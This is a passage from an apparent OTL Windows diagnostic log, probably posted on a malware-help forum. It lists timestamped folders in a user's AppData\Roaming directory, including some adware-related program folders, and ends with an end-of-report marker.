==========[/color] [2014-06-30 15:21:34 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\337Games [2014-10-29 00:08:54 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\AIMP3 [2014-10-29 00:53:56 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Autodesk [2014-09-25 00:43:28 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\avidemux [2013-09-13 23:03:03 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Babylon [2013-12-29 10:40:23 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Bonanza [2013-09-13 19:45:38 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\DAEMON Tools Lite [2014-10-30 21:22:46 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\DC++ [2013-10-15 08:56:34 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Dropbox [2014-02-08 12:22:45 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\DVDVideoSoft [2014-10-30 21:18:51 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\GG [2014-02-08 11:53:31 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\GoforFiles [2014-10-28 12:52:23 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\IGC [2013-10-23 10:51:51 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\OpenOffice [2013-09-16 23:01:58 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Opera Software [2014-10-05 21:23:26 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Origin [2014-09-24 22:19:21 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Systweak [2014-10-07 21:03:48 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\Thinstall [2014-03-10 22:49:34 | 000,000,000 | ---D | M] -- C:\Users\Admin\AppData\Roaming\WinZipper [color=#E56717]========== Purity Check ==========[/color] < End of report >